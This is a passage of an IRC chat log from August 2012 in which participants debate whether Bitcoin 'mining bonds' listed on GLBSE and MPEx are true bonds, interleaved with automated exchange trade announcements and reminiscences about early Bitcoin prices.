that's where you see the community is small and run by single individuals. Aug 13 06:42:49 I can hardly see a corporate entity acting like this Aug 13 06:43:02 i don't take your meaning ? Aug 13 06:43:40 They've sold a contract for X something, it will stay a contract for X something. Aug 13 06:44:16 yes, but unless its for X something money it's not a bond. Aug 13 06:44:17 They wouldn't upgrade to Y something on the pretense X something is now upgradable Aug 13 06:44:33 Because they sold X, not the underlying equipment that is upgraded Aug 13 06:44:58 All employees within a corporation are employed to get more money for the corporation. Aug 13 06:45:22 a different way to express this would be "the issuers realised how badly they're screwing so called but not really investors Aug 13 06:45:31 Goodwilling decisions are not acceptable, unless otherwise it would tarnish them and cause a loss of revenue Aug 13 06:45:35 [MPEX] [S.MPOE] 28700 @ 0.00037759 = 10.8368 BTC [+] Aug 13 06:45:39 and by the theory you can fleece a sheep many times but skin him only once, are now sweetening the deal" Aug 13 06:47:52 Well in any case, mining so far has been constantly profitable. And so far I see no real loss for any long term miners. GPUs can be resold, although if you bought just before FPGA/ASICs, it's pretty much a loss. Aug 13 06:48:23 hey, i've made profits too, but the point remains : they aren't really bonds. Aug 13 06:48:31 Indeed Aug 13 06:48:32 they're in fact very sophisticated financial instruments Aug 13 06:48:41 that people in general aren't capable to correctly value. Aug 13 06:48:50 Well yes, indeed Aug 13 06:48:51 im not arguing that "they're bad" or anything. Aug 13 06:49:06 im just saying, its NOT something random q citizen comprehends. Aug 13 06:49:36 The contract is that of a bond, but the issuers (at least the most reputable ones in the bitcoin community) decided not to leave them as fixed bonds. Aug 13 06:49:59 They are more like floating bonds moving up and down according to the operation's state I suppose. Aug 13 06:50:58 they are somewhat like floating bonds except really they're more like floating warrants Aug 13 06:51:17 which as far as i know was never yet used irl Aug 13 06:51:30 and if someone tried the house/sec./etc would have a weeklong fit Aug 13 06:51:31 [GLBSE] [FUTUREFUND] 10 @ 0.00011485 = 0.0011 BTC [+] Aug 13 06:52:46 Its like issuing a bond on a used car ... Aug 13 06:52:59 warrant? It's not optional, it's quite simply a direct weekly coupon for X mhash of mining... seems like a floating coupons bond... Aug 13 06:53:02 its never going to increase in value :) Aug 13 06:53:46 well in theory it's principal backing is that you have the option to directly realise your underlying mh/s Aug 13 06:53:56 (by selling the bond and buying the machinery) Aug 13 06:54:03 you don't have capital per se Aug 13 06:54:11 your only semblance of capital is this "option" Aug 13 06:54:19 which is really virtual anyway Aug 13 06:54:25 [GLBSE] [NYAN] 10 @ 0.99999999 = 10 BTC [+] Aug 13 06:55:03 I'm just not following you on that last bit... Aug 13 06:55:05 noagendamarket actually if the asic companies run off with everyone's money it might increase Aug 13 06:55:10 btc-mining lemme elaborate : Aug 13 06:55:22 if i hold a treasury my ownership extends over a certain sum of us$. Aug 13 06:55:33 if i own a mining "bond" my ownership extends over no sum of us$ or btc Aug 13 06:55:45 Ah, true, true Aug 13 06:55:45 my only ownership is over the theoretical output of a theoretical machine Aug 13 06:55:54 so it's a "sort of" warrant for that machine Aug 13 06:56:06 which is never physically settled, yes, but by the cash value Aug 13 06:56:51 but yea, it's really very contorted to define in fiat-terms what a mining "bond" is. Aug 13 06:57:03 A bond is a loan, it's tied to pay coupons AND pay back the full principal Aug 13 06:57:05 "floating coupon virtual warrant" FCVW for instance... Aug 13 06:57:08 yes. Aug 13 06:57:43 Ah, who started with giving those the name "bond" to start with? Aug 13 06:57:53 im not even sure. maybe bitbond ? Aug 13 06:58:03 i think giga got it from amazingr. Aug 13 06:58:19 A mining bond means you pay the operator for priviledge of loaning them money :) Aug 13 06:58:33 lol Aug 13 06:59:25 [GLBSE] [BIF.BTCST.PPT] 1 @ 1.0444 BTC [+] Aug 13 06:59:48 [GLBSE] [MU] 1 @ 0.5099 BTC [+] Aug 13 07:00:11 Well I have an actual mining copurchase shares on offer for those interested in less random things than mining "bonds" Aug 13 07:00:13 anyway im really curious what the guy has to say. wake up bobby!!! Aug 13 07:00:17 [GLBSE] [BMMO] 3 @ 0.108997 = 0.327 BTC [+] Aug 13 07:01:23 imo, unless there is some kind of web of trust for bitcoin funded assets, its a moot argument to me :P Aug 13 07:03:55 that has good and bad points :) Aug 13 07:04:10 [MPEX] [F.GIGA.ETF] 2000 @ 0.00109966 = 2.1993 BTC [-] Aug 13 07:04:11 [MPEX] [F.GIGA.ETF] 1000 @ 0.00110903 = 1.109 BTC [+] Aug 13 07:04:31 coingenuity isnt there ?! Aug 13 07:04:49 not to my highly untrained eye Aug 13 07:05:05 i've just heard something about some defaulting securities on the forum Aug 13 07:05:14 How would you achieve such a thing as a web of trust for assets? Aug 13 07:05:15 a well, glbse. Aug 13 07:05:20 on MPEx every lister is in the wot. Aug 13 07:05:28 heh Aug 13 07:05:30 simple : don't allow the riffraff to ipo. Aug 13 07:05:35 ^ Aug 13 07:05:38 Fact of the matter is, anyone can join GLBSE Aug 13 07:05:39 you don't have children when you're 3 Aug 13 07:05:48 you don't ipo as a dood that doesn't even know what gpg is. Aug 13 07:06:00 right, or IPO something without assets or history Aug 13 07:06:02 there's a progression. Aug 13 07:06:12 an ipo is the pinnacle of a career, not a sophomore year project. Aug 13 07:06:12 and many issuers are not only anonymous, but they want people to invest in a half done website/business Aug 13 07:06:30 yes they do :/ Aug 13 07:06:34 yup Aug 13 07:06:36 i wont touch it, for one Aug 13 07:06:55 You can find thousands of "personal startups" websites outside of bitcoin world and they almost fail 100% Aug 13 07:07:26 i think markac would round that to 100.0 Aug 13 07:07:32 he only has like 8 decimals. Aug 13 07:07:36 I see no reason to see any difference for bitcoins Aug 13 07:10:35 or they pay dividends for a short while from IPO funds then run off :/ Aug 13 07:10:51 feelsgoodman.jpg Aug 13 07:10:55 how many times has that happened ? Aug 13 07:11:04 i think i counted 10 ? 20 ? Aug 13 07:11:57 something like that Aug 13 07:12:14 noagendamarket btw, have we traded ? the name sure is familiar. Aug 13 07:12:17 I somehow managed to get BTC-Mining out of the low volume, numerous new issues that keep popping up. Aug 13 07:12:56 mircea_popescu no we havent. I havent traded otc for a long time. Aug 13 07:12:57 Like someone on the forum said, it takes quite a bit of seeding and efforts to get an issue going. Aug 13 07:13:15 ya it would have been last year Aug 13 07:13:30 my memory is not THAT BAD yet, current year i still can access fine Aug 13 07:13:39 lol Aug 13 07:13:58 I feel old :/ Aug 13 07:14:48 noagendamarket: its ok bro Aug 13 07:14:53 i remember sub $1 btc Aug 13 07:15:07 i never was around for that Aug 13 07:15:12 I remeber sub 10 cents btc :) Aug 13 07:15:13 i bought my first btc for $15 lol Aug 13 07:15:18 and then it suddently started going from $2->$5 ->$20 Aug 13 07:15:22 and guess what! I STILL HAVE THEM Aug 13 07:15:26 never realised that loss, so... Aug 13 07:15:33 heh Aug 13 07:15:42 baller :) Aug 13 07:15:46 :D Aug 13 07:15:58 was like, 60 btc, 15 $ each, 1k wham Aug 13 07:16:16 wish id bought those 10 000 btc for $50 now :D Aug 13 07:16:22 my first day haha. after vragnaroda got me to sit still for long enough to comprehend why gpg wot is a good idea Aug 13 07:16:27 ouch X_X\ Aug 13 07:16:30 Everyone does Aug 13 07:17:53 REBATE 1500@0.1249 Aug 13 07:17:54 I regret sending Bruce Wagner the first twitter message about bitcoin :D Aug 13 07:17:58 ouch, did someone just get pwned ? Aug 13 07:18:07 yes they did Aug 13 07:18:34 REBATE is fusked and so is Zipconf Aug 13 07:18:44 wasn't it frozen ?! Aug 13 07:18:55 apparently Aug 13 07:19:08 hmm, maybe it's the buyback ? Aug 13 07:19:55 nefario fat fingered it lol Aug 13 07:20:14 http://consciouslifenews.com/wikileaks-bombshell-trapwire-surveillance-spy-networ/1134041/ Aug 13 07:20:18 o this is juicy. Aug 13 07:21:04 noagendamarket: You know what's worse? I'm sure plenty of early adopters from the first months who were mining them a plenty deleted their wallet and left because their thousands of bitcoins were worth a few measly cents Aug 13 07:21:13 back even before mtgox Aug 13 07:21:16 im pretty sure Aug 13 07:21:26 has anyone done a count of money that has not moved since the mtgox failure ? Aug 13 07:21:40 cause that's prolly an important value, seeing how its really 21 mn - that. Aug 13 07:23:48 I wonder if satoshi ever used mt gox lol Aug 13 07:24:04 I got to repair that hole in the screening... night bugs keep entering and go for my screen Aug 13 07:25:16 i bet satoshi never did sell a single bitcoin. Aug 13 07:27:55 Did he ever mine at all to start with? I suppose so or there wouldn't have been a first few blocks. Unless he found a few people not long before launched, pitched the concept, and they started to mine since day one that the code was released Aug 13 07:28:05 he mined yea Aug 13 07:28:24 but i dont imagien he mined very much, and i dont think he sold any of it Aug 13 07:28:49 for many reasons, including "cant sell your own child" and "can't establish the best price to sell art so can't sell" Aug 13 07:28:56 and notably "want to be anon can't sell". Aug 13 07:29:03 How would you know he mined? No one knew him Aug 13 07:29:11 he mined 1st block Aug 13 07:29:14 first blocks mined might not have been him Aug 13 07:29:16 cause it has custom messate in it Aug 13 07:29:24 The first block cannot be spent Aug 13 07:29:34 but if he mined a block Aug 13 07:29:34 [MPEX] [F.GIGA.ETF] 14400 @ 0.00110903 = 15.97 BTC [+] Aug 13 07:29:35 [MPEX] [F.GIGA.ETF] 300 @ 0.00111116 = 0.3333 BTC [+] Aug 13 07:29:38 he prolly mined more than one Aug 13 07:29:38 and is not technically mined Aug 13 07:30:43 [MPEX] [F.GIGA.ETF] 7853 @ 0.00108629 = 8.5306 BTC [-] Aug 13 07:30:44 [MPEX] [F.GIGA.ETF] 8600 @ 0.00108432 = 9.3252 BTC [-] Aug 13 07:31:51 Sirius-m probably mined a few Aug 13 07:47:14 [GLBSE] [HYDRO.BONDS] 1 @ 1.56 BTC [+] Aug 13 07:48:14 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0351 = 4.1404 BTC [-] Aug 13 07:48:16 [GLBSE] [TYGRR.BOND-P] 26 @ 1.035 = 26.91 BTC [-] Aug 13 07:48:56 [GLBSE] [GIGAMINING] 1 @ 1.139 BTC [-] Aug 13 07:50:55 [GLBSE] [BIF.1YR.LOAN] 5 @ 0.94 = 4.7 BTC [-] Aug 13 07:53:10 [GLBSE] [YABMC] 7 @ 0.1239 = 0.8673 BTC [-] Aug 13 07:54:49 [GLBSE] [OBSI.HRPT] 20 @ 0.1047 = 2.094 BTC [-] Aug 13 07:54:50 [GLBSE] [OBSI.HRPT] 30 @ 0.1048 = 3.144 BTC [+] Aug 13 08:00:20 [GLBSE] [ASICMINER] 388 @ 0.1 = 38.8 BTC Aug 13 08:02:46 [GLBSE] [BIF.BTCST.PPT] 8 @ 1 = 8 BTC [-] Aug 13 08:04:40 [MPEX] [S.MPOE] 4100 @ 0.00037602 = 1.5417 BTC [-] Aug 13 08:10:55 [GLBSE] [FPGAMINING] 1 @ 0.967 BTC [-] Aug 13 08:12:51 [GLBSE] [RAREEARTH] 10 @ 0.0091 = 0.091 BTC [-] Aug 13 08:19:18 [MPEX] [S.MPOE] 61300 @ 0.00037699 = 23.1095 BTC [+] Aug 13 08:19:20 [MPEX] [S.MPOE] 31700 @ 0.00037759 = 11.9696 BTC [+] Aug 13 08:19:21 [MPEX] [S.MPOE] 7000 @ 0.00039355 = 2.7549 BTC [+] Aug 13 08:20:22 [MPEX] [S.BVPS] 150 @ 0.00341224 = 0.5118 BTC [+] Aug 13 08:20:23 [MPEX] [S.BVPS] 1125 @ 0.00330779 = 3.7213 BTC [-] Aug 13 08:20:25 [MPEX] [S.BVPS] 101 @ 0.00318722 = 0.3219 BTC [-] Aug 13 08:20:25 [MPEX] [S.BVPS] 124 @ 0.00303747 = 0.3766 BTC [-] **** BEGIN LOGGING AT Mon Aug 13 19:05:41 2012 Aug 13 19:10:14 [GLBSE] [YARR] 10 @ 1.5 = 15 BTC [-] Aug 13 19:10:16 [GLBSE] [YARR] 2 @ 1.50999999 = 3.02 BTC [+] Aug 13 19:12:45 [MPEX] [S.MPOE] 53000 @ 0.00037955 = 20.1162 BTC [-] Aug 13 19:15:41 [GLBSE] [TYGRR.BOND-P] 1 @ 1.0495 BTC [+] Aug 13 19:17:02 [GLBSE] [ASICMINER] 8 @ 0.1 = 0.8 BTC Aug 13 19:19:14 [GLBSE] [TYGRR.BOND-P] 2 @ 1.0495 = 2.099 BTC [+] Aug 13 19:21:21 [GLBSE] [NYAN.C] 1 @ 1.099 BTC [+] Aug 13 19:33:53 [GLBSE] [JAH] 10 @ 0.17 = 1.7 BTC [+] Aug 13 19:34:03 [MPEX] [S.MPOE] 60100 @ 0.0003965 = 23.8297 BTC [+] Aug 13 19:34:19 [GLBSE] [FPGA.CONTRACT] 9 @ 0.168 = 1.512 BTC [+] Aug 13 19:36:47 [GLBSE] [BITCOINMINV] 17 @ 0.121 = 2.057 BTC [-] Aug 13 19:41:21 [GLBSE] [BIB.PIRATE] 3 @ 1.045 = 3.135 BTC [+] Aug 13 19:42:43 [GLBSE] [ASICMINER] 5 @ 0.099 = 0.495 BTC [-] Aug 13 19:42:44 [GLBSE] [ASICMINER] 195 @ 0.1 = 19.5 BTC [+] Aug 13 19:43:57 [GLBSE] [YABMC] 1 @ 0.1234 BTC [-] Aug 13 19:51:36 [GLBSE] [MU] 1 @ 0.5099 BTC [+] Aug 13 19:52:17 [GLBSE] [MU] 1 @ 0.5099 BTC [+] Aug 13 19:53:28 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [+] Aug 13 19:57:14 [GLBSE] [BIF.BTCST.PPT] 5 @ 1 = 5 BTC [-] Aug 13 19:57:50 [MPEX] [S.MPOE] 31041 @ 0.0003965 = 12.3078 BTC [+] Aug 13 20:01:34 [MPEX] [S.MPOE] 209 @ 0.00037955 = 0.0793 BTC [-] Aug 13 20:01:36 [MPEX] [S.MPOE] 40153 @ 0.00037786 = 15.1722 BTC [-] Aug 13 20:01:36 [MPEX] [S.MPOE] 11400 @ 0.00037523 = 4.2776 BTC [-] Aug 13 20:01:37 [MPEX] [S.MPOE] 11984 @ 0.00037519 = 4.4963 BTC [-] Aug 13 20:01:38 [MPEX] [S.MPOE] 42800 @ 0.00037284 = 15.9576 BTC [-] Aug 13 20:01:40 [MPEX] [S.MPOE] 38200 @ 0.00037093 = 14.1695 BTC [-] Aug 13 20:01:41 [MPEX] [S.MPOE] 42300 @ 0.00037015 = 15.6573 BTC [-] Aug 13 20:01:42 [MPEX] [S.MPOE] 30040 @ 0.00036608 = 10.997 BTC [-] Aug 13 20:01:43 [MPEX] [S.MPOE] 66919 @ 0.00036205 = 24.228 BTC [-] Aug 13 20:01:43 [MPEX] [S.MPOE] 8839 @ 0.00036202 = 3.1999 BTC [-] Aug 13 20:01:45 [MPEX] [S.MPOE] 13278 @ 0.000335 = 4.4481 BTC [-] Aug 13 20:01:45 [MPEX] [S.MPOE] 11200 @ 0.00033173 = 3.7154 BTC [-] Aug 13 20:01:46 [MPEX] [S.MPOE] 2678 @ 0.00033135 = 0.8874 BTC [-] Aug 13 20:02:17 [GLBSE] [FPGAMINING] 1 @ 0.93 BTC [+] Aug 13 20:02:57 [MPEX] [S.MPOE] 456 @ 0.00033135 = 0.1511 BTC [-] Aug 13 20:09:20 [GLBSE] [BITCOINMINV] 30 @ 0.121 = 3.63 BTC [-] Aug 13 20:22:00 [GLBSE] [BITBOND] 1 @ 0.445 BTC [-] Aug 13 20:22:17 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0481 = 4.1924 BTC [-] Aug 13 20:22:19 [GLBSE] [TYGRR.BOND-P] 8 @ 1.048 = 8.384 BTC [-] Aug 13 20:28:31 [GLBSE] [BITBOND] 2 @ 0.4495 = 0.899 BTC [+] Aug 13 20:28:47 EskimoBob you about? Aug 13 20:31:09 mmm Aug 13 20:31:24 [GLBSE] [FOO.PPPPT] 3 @ 1.082 = 3.246 BTC [+] Aug 13 20:34:49 YARR paid! Aug 13 20:34:53 o there he is Aug 13 20:35:54 [GLBSE] [OBSI.1MHS] 31 @ 0.1 = 3.1 BTC [+] Aug 13 20:35:56 [GLBSE] [OBSI.1MHS] 16 @ 0.1 = 1.6 BTC [+] Aug 13 20:35:56 hi Aug 13 20:36:05 i am going to sleep soon Aug 13 20:36:40 sleep well. Aug 13 20:36:44 [GLBSE] [YABMC] 2 @ 0.1203 = 0.2406 BTC [-] Aug 13 20:39:57 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0494 = 4.1976 BTC [+] Aug 13 20:40:29 [GLBSE] [YABMC] 9 @ 0.1234 = 1.1106 BTC [+] Aug 13 20:42:56 [GLBSE] [YABMC] 4 @ 0.1234 = 0.4936 BTC [+] Aug 13 20:46:29 [GLBSE] [FPGAMINING] 1 @ 0.9 BTC [-] Aug 13 20:46:31 [GLBSE] [FPGAMINING] 4 @ 0.89 = 3.56 BTC [-] Aug 13 20:48:21 [GLBSE] [ASICMINER] 46 @ 0.1 = 4.6 BTC [+] Aug 13 20:49:29 [GLBSE] [TYGRR.BOND-P] 3 @ 1.0495 = 3.1485 BTC [+] Aug 13 20:51:01 [GLBSE] [PUREASIC] 12 @ 0.7 = 8.4 BTC [+] Aug 13 20:51:53 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [+] Aug 13 20:52:50 [GLBSE] [ASICMINER] 40 @ 0.1 = 4 BTC [+] Aug 13 20:54:34 fasten your seat belts! Nnew! Super cool! GLBSE db melting toy is on it's way :) Aug 13 20:56:16 [GLBSE] [GIGAMINING] 1 @ 1.139599 BTC [+] Aug 13 20:56:16 eh ? Aug 13 20:56:23 EskimoBob did you get my earlier ping ? Aug 13 20:59:53 [MPEX] [S.MPOE] 35633 @ 0.0003266 = 11.6377 BTC [-] Aug 13 20:59:54 [MPEX] [S.MPOE] 38086 @ 0.00033029 = 12.5794 BTC [+] Aug 13 21:01:14 [GLBSE] [YABIF] 99 @ 1.00000001 = 99 BTC Aug 13 21:01:15 [GLBSE] [YABIF] 1 @ 1 BTC [-] Aug 13 21:01:16 [GLBSE] [YABIF] 2 @ 1 = 2 BTC [-] Aug 13 21:01:17 [GLBSE] [YABIF] 1 @ 1 BTC [-] Aug 13 21:01:19 [GLBSE] [YABIF] 10 @ 1 = 10 BTC [-] Aug 13 21:02:59 [GLBSE] [ASICMINER] 4 @ 0.1 = 0.4 BTC [+] Aug 13 21:06:31 [GLBSE] [TYGRR.BOND-P] 5 @ 1.0495 = 5.2475 BTC [+] Aug 13 21:09:10 mircea_popescu: one from last night? Aug 13 21:09:17 yheah Aug 13 21:09:24 mircea_popescu: you wanted to look at some securities? Aug 13 21:09:43 yeah. Aug 13 21:10:07 OK, lets do it Aug 13 21:10:14 you have the list? Aug 13 21:10:21 yep one sec. Aug 13 21:10:36 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Aug 13 21:10:41 scroll down a little to where it discusses the bonds. Aug 13 21:10:59 kakobrekla: let me know when you are done and the lest run few test Aug 13 21:12:00 [MPEX] [S.MPOE] 2200 @ 0.00031962 = 0.7032 BTC [-] Aug 13 21:16:09 [GLBSE] [BIF.BTCST.PPT] 30 @ 1 = 30 BTC [-] Aug 13 21:16:43 interesting read Aug 13 21:18:04 [GLBSE] [GIGAMINING] 4 @ 1.13121 = 4.5248 BTC [-] Aug 13 21:18:06 [GLBSE] [GIGAMINING] 2 @ 1.13111 = 2.2622 BTC [-] Aug 13 21:18:19 the problem with bonds is: I as a bond holder, do not rally "care" so you make or lose money. No matter what happens, you owe me the promised % and you are obligated to return the principal Aug 13 21:19:17 now, the moment you make it in to a "if I make you get..." things get more complicated Aug 13 21:20:31 lets say you go for a FRN. Yes. part of the coupon (% what you have to pay me) is fluctuating but no matter what, there is still a fixed part of % Aug 13 21:21:00 spread is constant no matter what Aug 13 21:21:49 EskimoBob well, yeah. it'd be a twin bond and insurance ? Aug 13 21:22:50 you see, you as a bond issuer have to worry about insurance and this will lover the yield but increase the "secure" part of the deal Aug 13 21:23:14 FRN will let you pay me a premium % if you do well Aug 13 21:24:22 but if you frak up you still have to pay me the spread + principal Aug 13 21:24:27 this is true. Aug 13 21:26:27 still, it'd be a conditional bond Aug 13 21:26:38 "you have 1k usd principal and making this much per month, except in case of war" Aug 13 21:26:53 or, as it really is with bonds, "except in case of default" Aug 13 21:26:59 lest me ask this, if you make a killing on a month, do bondholders get something extra? Aug 13 21:27:05 nope. Aug 13 21:27:33 so whn do I have to share the loss with you? Aug 13 21:27:35 you see the problem here Aug 13 21:27:43 because you set your own %. Aug 13 21:28:13 but when you frak up, I get burned Aug 13 21:28:17 I share the loss Aug 13 21:28:29 there's no "i frak up tho", it's a math model, it works the same Aug 13 21:28:37 but you do not share the bigger than expected gain Aug 13 21:29:01 well it's not an equity deal. Aug 13 21:29:17 fuck mat, I am a bond holder :) I do not care. I want mu coupon to buy milk ... LOL Aug 13 21:29:23 exactly! Aug 13 21:29:24 [GLBSE] [BITBOND] 2 @ 0.4499 = 0.8998 BTC [+] Aug 13 21:29:54 so basically your ideea is that if i bought insurance myself and offered an insured tier too Aug 13 21:30:06 if you out a loan, then whn you have a loss, suddenly it acts like we share profit/loss Aug 13 21:30:08 then that'd be a bond, but this bondholder-insured thing is not, for that reason ? Aug 13 21:30:29 oops, i deleted parts of it Aug 13 21:30:52 but you're aware that what you describe is exactly what sovereign bonds are. Aug 13 21:31:03 you make x% unless the country fucks up, in which case you make a loss. Aug 13 21:31:03 if you get a loan from me, and when you have a loss, suddenly the loan acts like we share profit/loss - quity Aug 13 21:31:26 but you used my money - I have the risk Aug 13 21:31:47 and if you had greek bonds ? Aug 13 21:31:54 this is the problem with mining turd too Aug 13 21:32:38 then write this to the contract so that I get my spread no matter what and if thing go well, you pay me extra % from the gain Aug 13 21:32:44 then it's like a FRN Aug 13 21:32:45 from what i can see with mining "bonds"/FCVWs w./e the problem is depreciation is a given Aug 13 21:32:57 you don't know loss will occur on mpoe, actually historically hasn't really so far. Aug 13 21:33:14 you see, this is for the equity holders Aug 13 21:33:42 no ? Aug 13 21:34:06 hold on for sec.... There is polar bear at my door Aug 13 21:35:00 EskimoBob, can you run some tests there Aug 13 21:40:33 [GLBSE] [ASICMINER] 500 @ 0.1 = 50 BTC [+] Aug 13 21:41:03 [MPEX] [F.GIGA.ETF] 6400 @ 0.00109205 = 6.9891 BTC [+] Aug 13 21:43:32 OK, I am back Aug 13 21:45:21 mircea_popescu: you see, bond is a loan. Equity is like lets build some stuff and I'll give you some money. What ever you build, part of it is mine and so are the profits...AFTER! the bonds are paid off (its debt) Aug 13 21:46:09 if I lend you money, I do not give a flying f how you earn it back (actually I do but lets keep it simple) Aug 13 21:47:25 when the date is up, your friendly loan shark wants hes money + % and that's it Aug 13 21:48:46 If I lend you money, I do not want a part of your business. All i want, is my money and %. Aug 13 21:48:57 and this is the main difference. Aug 13 21:49:36 even if you want me to share the profit, you still have to return the % and principal Aug 13 21:50:10 you loss, is yours and this is something you business partner have to talk to you about :) not "me" as a bond holder Aug 13 21:50:48 shit where did mircea_popescu go? Aug 13 21:51:03 It was all written for him :) Aug 13 21:53:01 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC [+] Aug 13 21:53:59 [MPEX] [O.BTCUSD.P060N] 10 @ 0.05009701 = 0.501 BTC [-] Aug 13 21:54:04 [GLBSE] [BITBOND] 1 @ 0.4499 BTC [+] Aug 13 21:54:08 [MPEX] [F.GIGA.ETF] 9000 @ 0.00109205 = 9.8285 BTC [+] Aug 13 21:54:09 [MPEX] [F.GIGA.ETF] 2500 @ 0.00109439 = 2.736 BTC [+] Aug 13 21:54:46 [GLBSE] [ASICMINER] 55 @ 0.1 = 5.5 BTC [+] Aug 13 21:54:48 [GLBSE] [ASICMINER] 730 @ 0.1 = 73 BTC [+] Aug 13 21:56:45 [MPEX] [F.GIGA.ETF] 6500 @ 0.00109439 = 7.1135 BTC [+] Aug 13 21:56:47 EskimoBob: I think several people have tried making that argument to him before :) Aug 13 21:56:47 [MPEX] [F.GIGA.ETF] 3840 @ 0.0010947 = 4.2036 BTC [+] Aug 13 21:56:50 including me Aug 13 21:57:27 I'll let you judge whether it has worked or not :P Aug 13 21:58:24 [GLBSE] [ASICMINER] 4 @ 0.1 = 0.4 BTC [+] Aug 13 21:59:23 [GLBSE] [OBSI.HRPT] 1 @ 0.10485 BTC [-] Aug 13 22:00:39 [GLBSE] [ASICMINER] 19 @ 0.1 = 1.9 BTC [+] Aug 13 22:01:11 here i am EskimoBob Aug 13 22:02:09 you're describing a very teoretical bond. this is how it works in a world with no default. Aug 13 22:06:11 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC [+] Aug 13 22:06:41 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC [+] Aug 13 22:07:02 [GLBSE] [ASICMINER] 4 @ 0.1 = 0.4 BTC [+] Aug 13 22:07:48 [GLBSE] [ASICMINER] 20 @ 0.1 = 2 BTC [+] Aug 13 22:08:22 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC [+] Aug 13 22:11:25 [GLBSE] [ASICMINER] 15 @ 0.1 = 1.5 BTC [+] Aug 13 22:12:17 mircea_popescu: default is something else and not what you have there Aug 13 22:12:23 mmm Aug 13 22:12:24 [GLBSE] [PPT.E] 1 @ 1.185 BTC [-] Aug 13 22:12:29 how ? Aug 13 22:12:36 [MPEX] [S.MPOE] 27061 @ 0.00031359 = 8.4861 BTC [-] Aug 13 22:12:37 take the argentinian default. Aug 13 22:12:38 did you go under? Aug 13 22:12:46 sovereign bonds, sovereign default. Aug 13 22:12:51 you're thinking corporate bonds. Aug 13 22:13:05 no, mot at all Aug 13 22:13:21 so, what did it take for argentine to default ? Aug 13 22:13:21 US munis have gone under Aug 13 22:13:27 merely the statement thereof. yeah. Aug 13 22:13:49 greek bondholders took quite the hosing recently. why ? greece is still there Aug 13 22:13:56 plenty of pounds of flesh to be had. where's the flesh ? Aug 13 22:14:03 if you lose something on a short/long option deal - do you go under? Aug 13 22:14:03 [GLBSE] [ASICMINER] 35 @ 0.1 = 3.5 BTC [+] Aug 13 22:14:16 lol, is someone saying that those 'mining bonds' on glbse are actually bonds? Aug 13 22:14:36 EskimoBob by how it's set up, that's what'd be. Aug 13 22:14:50 smickles: not anymore with some clueless exceptions :) Aug 13 22:14:50 smickles no, im trying to use mr bob's expertise to sound my own bonds on Aug 13 22:15:17 mircea_popescu: do not take it personally but I think you need to rewrite it a bit Aug 13 22:15:35 I was actually thinking, is there a better way to finance those deals Aug 13 22:15:39 and I think there is Aug 13 22:15:48 why'd i take it personalyl ? Aug 13 22:16:00 you don't know me too well i guess, but i am all about finding the best ways to do finance in btc. Aug 13 22:16:17 OK, cool . so lets keep at it Aug 13 22:16:24 mircea_popescu actually has a record of changing MPEx's insturments when shortcommings are pointed out Aug 13 22:16:44 so Aug 13 22:17:02 [GLBSE] [YABIF] 2 @ 1 = 2 BTC [-] Aug 13 22:17:20 only part I did not like is that your bond starts to act like something else when there is a business loss involved Aug 13 22:17:26 and that's it Aug 13 22:17:30 it figures :) Aug 13 22:17:39 I personally think this is the unfair part Aug 13 22:17:40 to be honest, i originally imaghiend there'd be bankers stepping in to offer insured versions Aug 13 22:17:55 because you do not share your gain, when you do well Aug 13 22:17:57 you could easily put a bond into mpoe, and on it offer your own insured bond at a lower % Aug 13 22:18:02 as simple as that Aug 13 22:18:09 EskimoBob that's not an exact description, tho. Aug 13 22:18:20 the bondholder gets a share of theoretical gain EACH MONTH Aug 13 22:18:28 irrespective if variance makes the month's gain lower or smaller Aug 13 22:18:32 except in the case where there's no gain Aug 13 22:18:38 (aka, the math model is disproven in fact) Aug 13 22:18:39 no, they get the % - the coupon Aug 13 22:18:44 which would be a deal breaker Aug 13 22:18:45 [MPEX] [S.MPOE] 4839 @ 0.00031333 = 1.5162 BTC [-] Aug 13 22:18:46 [MPEX] [S.MPOE] 26900 @ 0.00031727 = 8.5346 BTC [+] Aug 13 22:18:47 [MPEX] [S.MPOE] 29905 @ 0.00032702 = 9.7795 BTC [+] Aug 13 22:18:50 yes, but your % is made of two parts Aug 13 22:18:57 the risk-free part for your capital Aug 13 22:18:58 do not confuse your gain as bonds share of your gain Aug 13 22:19:00 and the risk premium Aug 13 22:19:21 so, suppose risk free rate is i dunno, 1% a month ? Aug 13 22:19:23 you get 5% Aug 13 22:19:33 that extra 4% is your share of mpoe gain each month, hands ddown Aug 13 22:19:42 except in the months where mpoe fails [to behave as expected] Aug 13 22:19:44 "Although the financiers do not receive any part of profits made by MPOE, their financing is not without risk, because their capital will be used to answer any shortfalls, proportionally. " Aug 13 22:19:52 this is the part that fuck it up a bit Aug 13 22:20:10 listen. 5% a month comes to almost 100% a year. Aug 13 22:20:15 this is the equity guys problem Aug 13 22:20:16 you can't seriously tell me this is the risk-free rate. Aug 13 22:20:21 not the bond holders problem Aug 13 22:20:37 this is a different story Aug 13 22:20:42 ok. lets pause for a moment Aug 13 22:20:46 and consider a CD tranche deal. Aug 13 22:20:52 if you buy low tier, will you get hosed ? Aug 13 22:20:57 [GLBSE] [YABIF] 1 @ 1 BTC [-] Aug 13 22:21:04 We are talking about how a good bond operates not what the fair % is Aug 13 22:21:15 yeah. Aug 13 22:21:26 im gathering that the main problem here is that i haven't carefully enough sepparated the two parts Aug 13 22:21:42 ie, the insurance premium and the risk free rate, Aug 13 22:21:49 the % of coupon is meaningless in this context -- it's X Aug 13 22:21:52 or otherwise, the coupon from the profit participation of the bondholder. Aug 13 22:22:16 [GLBSE] [NYAN.B] 2 @ 0.98 = 1.96 BTC [-] Aug 13 22:22:22 yes Aug 13 22:22:55 if you include a "premium" - aka fixed rate coupon + risk reward, then you have a FRN. Aug 13 22:23:18 if you only add " risk reward" if everything is OK, Aug 13 22:23:19 i guess this is so. Aug 13 22:23:27 you are missing part of the deal Aug 13 22:24:06 so basically what btc finance needs most atm is an insurer. Aug 13 22:24:19 and lets not forget - your proposed "risk reward" is fixed - hence nothing extra, if you do well but I get fucked you you get fucked Aug 13 22:24:35 if ppl are buying the things as 